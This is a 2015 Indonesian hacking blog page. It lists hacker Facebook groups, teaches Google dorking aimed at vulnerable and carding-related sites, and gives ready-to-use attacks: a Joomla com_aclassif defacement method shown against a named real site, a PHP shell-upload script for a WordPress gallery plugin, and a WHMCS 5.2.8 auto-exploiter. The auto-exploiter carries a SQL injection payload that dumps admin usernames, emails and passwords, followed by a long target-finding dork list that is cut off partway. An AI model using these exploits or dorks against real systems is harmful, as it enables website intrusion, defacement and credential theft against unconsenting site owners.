Follow Instagram Kami [=>] www.instagram.com/rinaldi1001101 [=]

Minggu, 28 Juni 2015

Daftar Group hacker di seluruh indonesia

Indonesia Cyber Crew [OFFICIAL]
https://www.facebook.com/groups/IndoCyberCrew/

Java Intelegent Cyber Team [ Publik ]
https://www.facebook.com/groups/1376697492637675/?fref=ts

Dark Defence Cyber Team
https://www.facebook.com/groups/DDCT.Official/?fref=ts

HACKTIVIS
https://www.facebook.com/groups/1545397709040732/?fref=ts

™ NKRI CYBER ATTACKER ™ {диøичмøцs iиδøизsiд}
https://www.facebook.com/groups/878224435575817/?fref=ts

United Indonesian Hackers [ UNIHACK TEAM ]
https://www.facebook.com/groups/UNIHACK.phtml/?fref=ts

Bogor Grey Hacker Team (Official Group)
https://www.facebook.com/groups/bogorgreyhackerteam/?fref=ts

Anonymous Hacker Indonesia feat DarK-JusTice.Ri
https://www.facebook.com/groups/Anonymous.DJRI/?fref=ts

Anonymous Hackers
https://www.facebook.com/groups/tony.hacker/?fref=ts

Bengkulu Hacker Team Official
https://www.facebook.com/groups/Bengkulu.Hacker/?fref=ts

Palembang Hacker Link Chatting Group
https://www.facebook.com/groups/PeHaeL/?ref=ts&fref=ts

RAJAWALI ACEH CYBER TEAM [RACT] OFFICIAL™
https://www.facebook.com/groups/ract.official/?fref=ts

CYBER (Cilacap Young Brother Racing)
https://www.facebook.com/groups/491566220861751/?fref=ts

Show Off Zone [ Cirebon Cyber Crime ]™
https://www.facebook.com/groups/1591442534424330/?ref=ts&fref=ts

Note:
Sebenarnya masih banyak tapi yang saya ingat cuma segitu... :D
Diposting oleh Tidak ada komentar:

Cara Mengembangkan Google Dorks

Tipe dork yang saya sering gunakan dalam mengembangkan dork di google search engine :
  • Inurl        : merupakan website yang kita tuju, yang dimaksud dengan inurl ini mungkin adalah ( ' ) ini merupakan sebuah trick untuk melihat apakah website vuln atau tidak.
  • Intext      : kata - kata yang kita tujukan, ini dapat mencakup semua hal yang kita ketahui, misalkan.
  • Site         : Alamat negara yang kita tuju, dalam hal mengembangkan dork yang paling seting di gunakan adalah negara UK yaitu, Site:"UK" Kalian bisa mengganti Uk menjadi domain semua negara sesuai hati dan kebutuhan.
  • .php?xx= : Akhir dari sebuah inurl atau alamat website yang kita tuju.
1. Mengembangkan inurl
2. Mengembangkan intext
3. Mengembangkan Site
4. Mengembangkan .php?xxx=
1. Contoh inurl:"detail"    Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1.payment
2.detail3.author
4.content
 2. Contoh intext:"paypal" [ kata yang sering di gunakan untuk melakukan carding pp ]    Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1.Master Card
2.Visa
3.payza
intext tidak selalu terpaku kepada sebuah kartu credit seperti pp/cc,Perlu di ingat untuk dork, kalian tidak harus menggunakan semuanya dalam pencarian di googleSeperti inurl:"content".php?id=" intext:"paypal" Site:"UK"      
[ Biasanya kalau kita tambahkan Site tetapi sudah ada intext tidak akan ada website yang tersedia ]
Jadi kalian bisa menghilangkan salah satu antara intext maupun site. 

3. Contoh Site:"il"    Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1.   UK
2.   US
3.   SG
4.   MY
5.   KR
4. Contoh .php?id="    Kalian bisa mengganti dengan kata kata yang lainnya seperti :
 1.   .php?cat="
2.   .php?carID="
3.   .php?category="
4.   .php?id="
Diposting oleh Tidak ada komentar:

Deface Metode com_aclassif

Deface Metode com_aclassif

Joomla Component com_aclassif


dorknya : inurl:"index.php?option=com_aclassif"

exploitnya : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

pertama cari dulu sitenya :contoh : http://www.amityconnect.com/

terus tambahkan exploitnya
/index.php?option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Contoh : http://www.amityconnect.com/index.php?option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

nanti boleh isi smua kolom/yg paling bawah :v bisa txt,jpg, dll :v
setelah itu submit add , nah kalo udah beres nanti ada bacaan view addklik view dan hasilnya seperti ini

http://www.amityconnect.com/components/com_aclassif/photos/mtmd72920.txt
Diposting oleh Tidak ada komentar:

Web Toolls

Diposting oleh Tidak ada komentar:

Wordpress Plugins Complate Gallery Manager

Google dork : "inurl:/wp-content/plugins/complete-gallery-manager/

exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php

Script php :

$uploadfile="asu.php";
$ch = curl_init("http:site/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Upload Access Path : http://site/wp-content/2013/09/asu.php

1. Ganti http://site dengan target lo
2. akses script php dengan XAMPP
3. Masuk shell
4. Tebas Index
Diposting oleh Tidak ada komentar:

Com_sexy

coba gunakan ini broh http://www.server3.com.br/formcraft.php auto exploit ,cara pemakaian , masukan url ke kolom lalu klik start , jika ada yg vuln akan muncul found , tapi kalo not found itu gak vuln 404 string gak usah di apa apain nah untuk exploit yg di bwah nya itu untuk mengunci target , masukin target yg vuln tadi hasil scanning di atas ,tanpa ( http:// dan www.)contoh : http://localhost.com masukkan: localhost.com nya saja lalu ini memang sengaja saya ribetin alias gatau dan ngerti coding jadi setelah klik start , maka halaman akan kembali ke awal tapi gpp , untuk mancing kembali yg tadi , tinggal masukin ulang target nya lalu start , dan di bawah nya ada tempat upload kan?upload shell kamu , dan keep sabun ini sebenernya exploit admin finder dan exploit com_sexy , namun saya recoded dan gabungin thanks banyak  DAN SATU LAGI ? HARGAI KARYA ORANG LAIN :)
Diposting oleh Tidak ada komentar:

script WHMCS auto exploit 

<?php
/*
*****************************************************
  WHMCS Auto Exploiter 5.2.8
*****************************************************
*/

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
 $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
 $rank1 = $xml->SD[1];
 if($rank1)
  $rank = $rank1->POPULARITY->attributes()->TEXT;
 else
  $rank = 0;
 return $rank;
}
 
function google_that($query, $page=1)
{
 $resultPerPage=8;
 $start = $page*$resultPerPage;
 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
 $resultFromGoogle = json_decode( http_get($url, true) ,true);
 if(isset($resultFromGoogle['responseStatus'])) {
  if($resultFromGoogle['responseStatus'] != '200') return false;
  if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  else return $resultFromGoogle['responseData']['results'];
 }
 else
  die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
 
function http_get($url, $safemode = false){
 if($safemode === true) sleep(1);
 $im = curl_init($url);
 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($im, CURLOPT_HEADER, 0);
 return curl_exec($im);
 curl_close();
}

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
 curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
 curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
 curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
 $source = curl_exec($curl_connection);
 preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
 if($infoz[0]) {
  return $infoz[0];
 }
 else
  return "Fail!";
}
else
 return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter</title>
</head>
<body style="background-image: url('http://th01.deviantart.net/fs71/PRE/i/2013/249/d/4/blue_electric_tiger_by_gb_art3-d6l7rj5.png'); background-size:cover;">

<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border                  : dashed 1px;
border-color            : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: blue;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: blue;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border                  : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
        SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: blue;
background-color: Black;
}
.main {
margin                  : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
 
A:link {
        COLOR: White; TEXT-DECORATION: none
}
A:visited {
        COLOR: White; TEXT-DECORATION: none
}
A:hover {
        color: blue; TEXT-DECORATION: none
}
A:active {
        color: blue; TEXT-DECORATION: none
}
 
#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:lime;}
#result .X{background-color:blue;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
    <style>
      body {
        font-family: 'Audiowide', serif;
        font-size: 30px;
               
      }
    </style>
  </head>

  <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF">
    <center>
<font face="Audiowide" color="black">WHMCS Auto Exploiter</font>
<br>
<font color="black" size="3">WHMCS ver. </font><font color="black" size="3">5.2.8</font>
</font>
<br><br>

<table border=1 bordercolor=blue>
<tr>
<td width="700">
<br />
<center>
 <form method="post">
  Google Dork: &nbsp;&nbsp;
  <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php site:.'; ?>" />
  &nbsp;&nbsp;<input type="submit" value="Crotz!" id="button"/>
  <br><br>
    <select size="20" onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;">
<option>inurl:/cart.php WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= hosting WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= reseller WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= vps WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= virtual private server WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= IIX WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= SG WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= OVH WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= rackspace WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= autodj WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= isp WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= windows WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= coupon WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Lihat Keranjang WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Order Now WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= dedicated WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= colocation WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Teamspeak WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= ssh WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= virtualizor WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= minecraft WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= bestellen WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= cpanel WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= ssl WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= license WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= bundle WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= usa WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= litespeed WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= apache WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= hospedagem WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= revenda WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= domain WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= subdomain WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= servidores WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= dedicados WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= free WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= FREE! WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= trial WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= usd WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Beginner WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Advanced WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Professional WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Premium WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Ultimate WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Basic WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= B?sico WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Plano WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Lite WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Expert WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Extreme WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Bronze WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Silver WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Platinum WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Gold WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Student WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Family WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Friends WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Business WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 15 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 20 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 30 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 40 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 50 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 100 MB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1 GB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2 GB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3 GB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4 GB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5 GB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10 GB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1 TB WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= unlimited WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= openvz WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= kvm WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= stream WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= solusvm WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= plesk WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Monthly WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Quarterly WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Semi-Annually WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Annually WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Biennially WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Triennially WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Transfer Domain WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Register Domain WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Free Domain WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= Setup Fee WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= View Cart WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= $ WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=   WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=   WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=   WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 0.00 WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 0.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 6.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 7.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 8.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 9.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 6.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 7.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 8.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 9.50 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 9.90 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 20.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 30.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 40.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 50.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 60.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 70.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 80.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 90.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 99.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 100.00 USD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 0.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 20.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 30.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 40.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 50.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 100.00 EUR WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 0.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 20.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 30.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 40.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 50.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 100.00 AUD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 0.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 20.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 30.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 40.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 50.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 100.00 CAD WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 0.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 1.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 2.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 3.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 4.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 5.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 10.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 20.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 30.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 40.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 50.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid= 100.00 GBP WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=1  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=2  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=3  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=4  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=5  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=6  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=7  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=8  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=9  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?gid=10  WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?a=add&pid= WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?a=add&domain=register WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?a=add&domain=transfer WHMCompleteSolution site:.</option>
<option>inurl:/cart.php?a=view WHMCompleteSolution site:.</option>
<option>inurl:/announcements.php WHMCompleteSolution site:.</option>
<option>inurl:/knowledgebase.php WHMCompleteSolution site:.</option>
<option>inurl:/dologin.php WHMCompleteSolution site:.</option>
<option>inurl:/clientarea.php WHMCompleteSolution site:.</option>
<option>inurl:/submitticket.php WHMCompleteSolution site:.</option>
<option>inurl:/submitticket.php?step=2&deptid=1 WHMCompleteSolution site:.</option>
<option>inurl:/submitticket.php?step=2&deptid=2 WHMCompleteSolution site:.</option>
<option>inurl:/submitticket.php?step=2&deptid=3 WHMCompleteSolution site:.</option>
<option>inurl:/viewticket.php WHMCompleteSolution site:.</option>
<option>inurl:/register.php WHMCompleteSolution site:.</option>
<option>inurl:/pwreset.php WHMCompleteSolution site:.</option>
<option>inurl:/login.php?action=reset Powered by WHMCS site:.</option>
<option>inurl:/admin/login.php?action=reset Powered by WHMCS site:.</option>
<option>inurl:account. WHMCompleteSolution site:.</option>
<option>inurl:accounts. WHMCompleteSolution site:.</option>
<option>inurl:billing. WHMCompleteSolution site:.</option>
<option>inurl:whmcs. WHMCompleteSolution site:.</option>
<option>inurl:central. WHMCompleteSolution site:.</option>
<option>inurl:client. WHMCompleteSolution site:.</option>
<option>inurl:cliente. WHMCompleteSolution site:.</option>
<option>inurl:clientes. WHMCompleteSolution site:.</option>
<option>inurl:clients. WHMCompleteSolution site:.</option>
<option>inurl:clientarea. WHMCompleteSolution site:.</option>
<option>inurl:core. WHMCompleteSolution site:.</option>
<option>inurl:host. WHMCompleteSolution site:.</option>
<option>inurl:hosting. WHMCompleteSolution site:.</option>
<option>inurl:hospedagem. WHMCompleteSolution site:.</option>
<option>inurl:klanten. WHMCompleteSolution site:.</option>
<option>inurl:loja. WHMCompleteSolution site:.</option>
<option>inurl:my. WHMCompleteSolution site:.</option>
<option>inurl:myaccount. WHMCompleteSolution site:.</option>
<option>inurl:myaccounts. WHMCompleteSolution site:.</option>
<option>inurl:order. WHMCompleteSolution site:.</option>
<option>inurl:panel. WHMCompleteSolution site:.</option>
<option>inurl:painel. WHMCompleteSolution site:.</option>
<option>inurl:portal. WHMCompleteSolution site:.</option>
<option>inurl:support. WHMCompleteSolution site:.</option>
<option>inurl:secure. WHMCompleteSolution site:.</option>
<option>inurl:whmcs. WHMCompleteSolution site:.</option>
<option>inurl:web. WHMCompleteSolution site:.</option>
<option>inurl:webhosting. WHMCompleteSolution site:.</option>
<option>inurl:/account/ WHMCompleteSolution site:.</option>
<option>inurl:/accounts/ WHMCompleteSolution site:.</option>
<option>inurl:/billing/ WHMCompleteSolution site:.</option>
<option>inurl:/whmcs/ WHMCompleteSolution site:.</option>
<option>inurl:/central/ WHMCompleteSolution site:.</option>
<option>inurl:/client/ WHMCompleteSolution site:.</option>
<option>inurl:/cliente/ WHMCompleteSolution site:.</option>
<option>inurl:/clientes/ WHMCompleteSolution site:.</option>
<option>inurl:/clients/ WHMCompleteSolution site:.</option>
<option>inurl:/clientarea/ WHMCompleteSolution site:.</option>
<option>inurl:/core/ WHMCompleteSolution site:.</option>
<option>inurl:/host/ WHMCompleteSolution site:.</option>
<option>inurl:/hosting/ WHMCompleteSolution site:.</option>
